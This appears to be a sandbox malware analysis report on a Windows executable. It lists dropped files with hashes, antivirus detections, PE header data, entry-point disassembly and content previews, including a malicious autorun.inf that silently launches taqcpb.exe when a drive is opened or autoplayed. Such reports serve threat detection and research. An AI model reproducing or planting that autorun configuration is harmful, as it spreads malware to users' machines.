                                                                                                                                                                                                                                  SHA-512:F557A853792E1DA58E56A57F1093FA27B006B195C5769282D111F11A643021B249BDA35FAF328F1014FE79669E281527D655811FC570ED43F0FED777C561DA83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzIxNC42NDQ6MTEyZDZkYjRhYzk3Nzc1MjUyZGMyZTI3Zjk2ZjFmZjBlMDEzODVlNzZiNDkwYjJkMDNlMjFkYzViYzMyMGI1NDo2NzEyMTBkZTlkMzg0';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBkZTlkMzM3fHx8MTcyOTIzNzIxNC44
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.642834749027684
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFSITcbMqUtmtE9VCeNocBZ3M7ioaxyi6CVN/MTf992wP:LDpUh9VVN7Si1yi7Ul928
                                                                                                                                                                                                                                  MD5:6D59263785D7B6A6E9C9FA63573FEE3F
                                                                                                                                                                                                                                  SHA1:66E4C072F7E5385E3A7D80CFF887D9628A1478D7
                                                                                                                                                                                                                                  SHA-256:367A921653EC2A4392695DAE2D6560F906B0083ADC5219FB2657B49CB2CE7F3D
                                                                                                                                                                                                                                  SHA-512:58EB1D4A281890D0D41056B745B869ADAC2D9C225B55486BEFA528BDEFB0CA80B05EA4FD6598EBBFC3EB9EE4B3B280971A8C04B0968A15287CA02DD521E5558E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEwMi4yMzc4Ojk3NmU2OGU5NGJlZDI2MTAyZTkwZThmM2ExNWM1OGIxOGYyZGMyYjIyZGI5ODNlOWRlYzhlZDk5MmMxYjVjZGI6NjcxMjEwNmUzYTBjOA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA2ZTNhMDZjfHx8MTcyOTIzNzEw
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.641128000089452
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFA21MqUtmtE9VCtpZ3cBsO3M7ioaxyi6CVUlEnMTf992wP:N2HUh9VmYQi1yi7UlEel928
                                                                                                                                                                                                                                  MD5:D4F2F2283C5A57A8812EEC084C63FBB7
                                                                                                                                                                                                                                  SHA1:D42FBE404FD7B29BA4F8BBBADFC6C09D7A8DB991
                                                                                                                                                                                                                                  SHA-256:E320A6AF5B25CBB6F36DB446CE79EC331F0D470BEE41C263923638B8965A75F8
                                                                                                                                                                                                                                  SHA-512:E4C75E3E190077298C0334BDDADF4221082049A9E229DC9395E220FA455BF24276FBEA741866C96F96599DA789FD0ABC1A7783F065BB454DB86367EE4EA7612C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE0Ni40MDk4OmY5YzM3NmNlN2RjMWJmNmY0MjdiNDI1MmE1MDQ4MjlkOTI3OGQxMjQyOWFmNjM2NjU3ZGI5MzRmZjg2YTYzOTk6NjcxMjEwOWE2NDBlYg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5YTY0MGMwfHx8MTcyOTIzNzE0
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.646291591905834
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFlhoiMqUtmtE9VCm163cBI3M7ioaxyi6CV3MTf992wP:+VUh9Vj6sxi1yi7ul928
                                                                                                                                                                                                                                  MD5:7EC9B733A5419F16755367D6436BCE2E
                                                                                                                                                                                                                                  SHA1:77C258693D64077CD964EA6B4814484BB68E3C99
                                                                                                                                                                                                                                  SHA-256:B4313ED159B089D8CA3EA359A9A0C169C37571DBEC0340BB63993F75E2F01D77
                                                                                                                                                                                                                                  SHA-512:D961DFD7457744C26E3482B80E5334BEFF1894C708A785467A34521E63E0A55E7217A5A49E262C91893F0DE824E9206D3C9907B8AC53E73406B8C3DCB8074341
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE5NC45OTo0Y2M3NmJjYTg5N2I4ZjdhODAxZmM5MWZhNGNhMjhmMDUyYWQxMjU2NzM5OGRiZmFiOThhNGY0MWY1ZDBiNmM0OjY3MTIxMGNhZjFiMmU=';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBjYWYxYWYxfHx8MTcyOTIzNzE5NS4x
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.639805032033733
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF8FjZFHMqUtmtE9VCffU7IcBLs3M7ioaxyi6CVUMTf992wP:xjZHUh9VmAbNi1yi71l928
                                                                                                                                                                                                                                  MD5:602633DE2C81589CF9D3D4924D1B19CE
                                                                                                                                                                                                                                  SHA1:88E139C18B6853962B2255879FCC6956884E0D5C
                                                                                                                                                                                                                                  SHA-256:A889553F798459AF5ED76D40CFAAECFD188F2C8CAC5F2AB18F3F128C6637C922
                                                                                                                                                                                                                                  SHA-512:34353FD12131BDCA01D8729F081781E5E6B97B37FCE3674B7D16F5D5AADED281D748F31DE9DECCDDDF593B3FCE320A7D4C2D04864A6A2F7A1E1367459FCADF44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzIwNC44MTk1OmJlNzE3ODRmZTA4MzUxZDcxYmFlM2Q4NDY1ZDQyMDA2NDM1NmM2M2I4Y2JmYmRmM2Q2NzZmZWNmMmM2Nzc1Yjc6NjcxMjEwZDRjODBmZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBkNGM4MDljfHx8MTcyOTIzNzIw
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.6564289139940485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF8/MkcMqUtmtE9VCAccBx3M7ioaxyi6CVzKMTf992wP:Lz4Uh9Vpui1yi7Hl928
                                                                                                                                                                                                                                  MD5:309F786BD133C016CDE0BA32E35A740D
                                                                                                                                                                                                                                  SHA1:566DF1721029E957238031C04D2BCC956063D6C4
                                                                                                                                                                                                                                  SHA-256:3A78AB34778137D546F970A32E4EA0BCA2A42A365E93D0CA78CC13FF9D9CB52A
                                                                                                                                                                                                                                  SHA-512:1E510053DAB692F3B85842F94E96624D122042FC5594012B0C07AAC94638EABCD4F7D34D5B704C2D77BB15EA70954E1F7CDC7726CEFEAB56676942CBBCE04588
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.64247713644331
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFIDB5mMqUtmtE9VCqwjcBWm3M7ioaxyi6CVPMTf992wP:BDB52Uh9VFMi1yi7Gl928
                                                                                                                                                                                                                                  MD5:3715B8D081813AD641B29F11DD7E8EF6
                                                                                                                                                                                                                                  SHA1:9C838A0FFB17E6E3338F54EBA2448AB210E2E16B
                                                                                                                                                                                                                                  SHA-256:0520D3B916514F49DC6EFE53E40767D7D739826E86EE9567F5CB123C3FD25B9E
                                                                                                                                                                                                                                  SHA-512:9B4190C2D275892623E3F48B08F76E947F1A25729BDCDFFB38C4DE5C023122C7BDCED9D1A65809623230EBD177C8F30E4B00D87947BFA028D779305B9BC0EFC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.658574408919888
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF352UMqUtmtE9VCJcBvn43M7ioaxyi6CVwYMTf992wP:O2gUh9Vd1Xi1yi7Wl928
                                                                                                                                                                                                                                  MD5:1B2AB392EE05D9961C535FD24A34578D
                                                                                                                                                                                                                                  SHA1:6BC7D14EA12C7D4FA386A4E0CBFED65CC2D17A72
                                                                                                                                                                                                                                  SHA-256:5688819D68F7BD8110B8295A8876CFD4C64751492A48ED06C3E83FF4E6248F0A
                                                                                                                                                                                                                                  SHA-512:6754D9B9A16A8DD482C87E0294C0B21048E1A75CFB387D9E632AD72545B837147D122CD346DA444CF1EA734AF05DC967557C2B95C2DC9DF6C58041523A94C002
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.6496569957265255
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFnEAMqUtmtE9VCtUcBa3M7ioaxyi6CVC3MTf992wP:gUh9VWnXi1yi7Dl928
                                                                                                                                                                                                                                  MD5:5F25F848A47EC95B9F0B64BE978FDA92
                                                                                                                                                                                                                                  SHA1:BCE2339FE3DF3F8B336A78C5F68F3F72D9F26074
                                                                                                                                                                                                                                  SHA-256:9F7E2A973EAEFC9059BE64BDE52E70F04960DD2780989477FF77D49C5983F2CC
                                                                                                                                                                                                                                  SHA-512:24CE08F7718F7B27B1C80ECC904EEDEB4B7EA72BB0D338095F971D2FC0C622794E8761B6B07C3019E867DF0F44150C7B6697F53609412E7315425F8F3208E52A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.654806351706595
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF/qQh6MqUtmtE9VCshcBJ2cFp3M7ioaxyi6CVgnMTf992wP:wr0Uh9Vq0i1yi7Dl928
                                                                                                                                                                                                                                  MD5:79F64D7CA5FC037FB0D5C45999EB4080
                                                                                                                                                                                                                                  SHA1:5E914AFC461272F13CD463EA3BDD3A2D42B1D07E
                                                                                                                                                                                                                                  SHA-256:E84AA02F089965362871A25C1C9453996195CCB1FDC05983FA522834143E453F
                                                                                                                                                                                                                                  SHA-512:309823A1445DBF7D448BAEAA85F6F8A51D0214679FD720B67EFC532ED50F31398C5779F01690E891064D496AA24ABE0931EEAD99A3B8157E69F73EEB41D60ECD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.979835390414891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:F5aMWAzo5SfpxAF5f5GeE8n8TJbxhc4wpBO:+QIr5GeE8nCbxhnwO
                                                                                                                                                                                                                                  MD5:9EEA00E1926A113F9B3ACB3D3E59F65F
                                                                                                                                                                                                                                  SHA1:AEA1A00FD6D1584F8AF8B4BF76EB5544A3222A28
                                                                                                                                                                                                                                  SHA-256:35DF0D02753C47DDA8A9D9A354685BB3C81E16049A51BF5B9C2E3167F5F7AB5B
                                                                                                                                                                                                                                  SHA-512:36823D11AC02D91712EA0BD6F240D8ABC59103730664B49854DAD058AE350CD58D8439D2894B3C5C7E5E8A5052477D24C871D9748CE9EF4009F96179B4818D60
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.97458365365783
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:A3ih6kEiSSyEAOTSpOQ3B6orsCb/vY0RYrzGuUGy63G9zr:A3ihTchEhBCDsw/v/YrPyRzr
                                                                                                                                                                                                                                  MD5:68D82A025135407799E9940ED4CE0DB0
                                                                                                                                                                                                                                  SHA1:467A3D0B1ACF45239184A580D3AC391536C53D08
                                                                                                                                                                                                                                  SHA-256:768E75F182EB79C6D58BD29B493D637A6355603A4C2EE23F0C53A48DAEB56167
                                                                                                                                                                                                                                  SHA-512:A34B9C58B8885FBC6E39F677A2A74667415D29657E39F0CF11CB21A268F9F7039891E88C617909E846B3923939316D67379C5FB488E1B00A6A93981A24AFF1FD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.974572330536516
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:/QlTc2D1WmV6VFFJMJzF9Q81F9Od6/CymPEbcr9ShpFGiF9lDv0sVl:/QlrCwcW/CymPEbcJwN0sf
                                                                                                                                                                                                                                  MD5:32828845FFADA76497C37FC525ACE86E
                                                                                                                                                                                                                                  SHA1:6319D250EEDB17CA6358CF08CC47147AAE47328F
                                                                                                                                                                                                                                  SHA-256:CE2F1DEC663BDF3076D824075AFAD038B52866E14C96325202CC07E01C300302
                                                                                                                                                                                                                                  SHA-512:54F82DB58770884E2E78A16A5AD97F5E367F38D2BD1C56EC6D320A06FAD19062F23EE2CC0D98DC6D458F4B42958DB5E0121FFE6584E0C631CD8C76894440D792
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................[.n..~..f...R.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:Windows SYSTEM.INI
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):255
                                                                                                                                                                                                                                  Entropy (8bit):5.25999590328634
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPgdTk:F4Yv7yk3OUBq82wqFtPgdY
                                                                                                                                                                                                                                  MD5:C1472E2DFC5756C8F34B78E05ACF0680
                                                                                                                                                                                                                                  SHA1:8ECE57FAE13D075987CB3BEEF32FC9A61CC2579F
                                                                                                                                                                                                                                  SHA-256:1D05E477257AC17C0EF606D35958E54A5C1388A8ACCD43DD77FE3368460E7F74
                                                                                                                                                                                                                                  SHA-512:672EE7F9E68BFA8975606F8897766042F26866A60992D3B7E2545E87E020D4AF6681E429A6FB8C4968E6F752BC7DC37BD101F8713158C4AD81D11C69D13CD2C7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=46390628699..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:Microsoft Windows Autorun file
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                  Entropy (8bit):5.5040608057125295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:2Tv2mlA/+9poldltgHP1Lwj1HXGFoCM69oa4GYVVEu2WoNFf8cDRAC3Rnw3WoGkc:23AW9poH3GP1LwQFxoD6u1oNFf82p36+
                                                                                                                                                                                                                                  MD5:37A015B73BDC46535BB45BBDAD0D4EBB
                                                                                                                                                                                                                                  SHA1:9FB06F046C9A31998ED18076867216E6ABEE0996
                                                                                                                                                                                                                                  SHA-256:BAB1E83DA3F6691A58018CE64C99AA5B9DC5CB9DB91E2D62D59A26B6B0D0D198
                                                                                                                                                                                                                                  SHA-512:18FAE953438B5AD9D1ED4CDBE30105009A3A03287F05DDB8EC0485466A86DC9A058806C5EFA841C8FFE6E2AD427844EF246819B6177AAC5269510D25572025A9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:[AutoRun]....;HygevqrWejp ..;IjCTFe ..OPen=taqcpb.exe....;gekqcrgxkjqixHY JvnhDKTCum ckwaijKErXjEtwU LmqoKpgA pOCuSItli yomgk ..sHEll\open\DefaulT=1....;QOiqYrpWtITlgFStx..SHEll\ExplorE\coMMAnD =taqcpb.exe..;wUFW brauTGnUkHyveL KsnCpnDjmgdBqFn gVlgu RImfBx ..SHell\oPen\comManD=taqcpb.exe..;..ShelL\AUtoplay\cOMmand=taqcpb.exe..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):99328
                                                                                                                                                                                                                                  Entropy (8bit):7.852859120977788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:/QlrCwcW/CymPEbcJwN0sDfv7+unohVOJbBmUck:/QFKomPEbcGWsH+7Yrck
                                                                                                                                                                                                                                  MD5:46D5AF1958B65C44A1E08007A4058B82
                                                                                                                                                                                                                                  SHA1:933A7627848DD48C88A1704065587C7F3A1A7BA0
                                                                                                                                                                                                                                  SHA-256:DA37A2F2EE259C34404C0B92A58DE7822952F238E96EE89BD1E4A2AD46C29190
                                                                                                                                                                                                                                  SHA-512:F57C557E08E15602A8DD01CC51A533EC28B06BD4FD9EA7B847EFD9250DCC74A5AD9F51DB6E1D7A99A9752CA6B79F54CB4FE7BBCA0152E00DE2C12DED15D1C539
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................[.n..~..f...R.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Entropy (8bit):7.934883635599941
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File size:2'969'674 bytes
                                                                                                                                                                                                                                  MD5:31bbb64aa3c1753cd99c865869b58023
                                                                                                                                                                                                                                  SHA1:339ecde6fcc4833268f84d0dd5bcb11606ea5e94
                                                                                                                                                                                                                                  SHA256:1a089c8808acf7d3a83c0524e07bd0bb888ab3c987d109bae0613e456c08f32f
                                                                                                                                                                                                                                  SHA512:fc170e42c5017927e44ba2766a6e9073700ce44cf6ea0380c2db260bdc264ea301c2334301a9a796d503760897d915ebdeb31de1d1c9015f0127b952c544bf43
                                                                                                                                                                                                                                  SSDEEP:49152:w4cAGktbxe0UsqKjT4tOGLuyXKpp9vmwneeiL+apGylxetIgUmJF7X:u6tbxhZ3YJ6pp9vmwneeE7pGy6emJ1X
                                                                                                                                                                                                                                  TLSH:17D53344DA470F82EB445B7A82B572C21EE784C986B05FADD4B3951C89BE6031DFB1CB
                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ...Y...z...Y..._...Y..Rich.Y..................PE..L.....!J...........
                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                  Entrypoint:0x864058
                                                                                                                                                                                                                                  Entrypoint Section:.boot
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                                  Time Stamp:0x4A2182FD [Sat May 30 19:03:25 2009 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:32c5605c17ed8c33b7bc669a699350af
                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  inc ebp
                                                                                                                                                                                                                                  not edx
                                                                                                                                                                                                                                  neg ebx
                                                                                                                                                                                                                                  sub edi, 00007FA7h
                                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                                  sub edi, 000018D1h
                                                                                                                                                                                                                                  cmp edi, ecx
                                                                                                                                                                                                                                  js 00007FC16C7D7E67h
                                                                                                                                                                                                                                  inc ebx
imul edi, eax
dec eax
inc al
mov edi, eax
test bh, bl
cmp ecx, 0000930Ch
jne 00007FC16C7D7E63h
dec ebx
bswap ebp
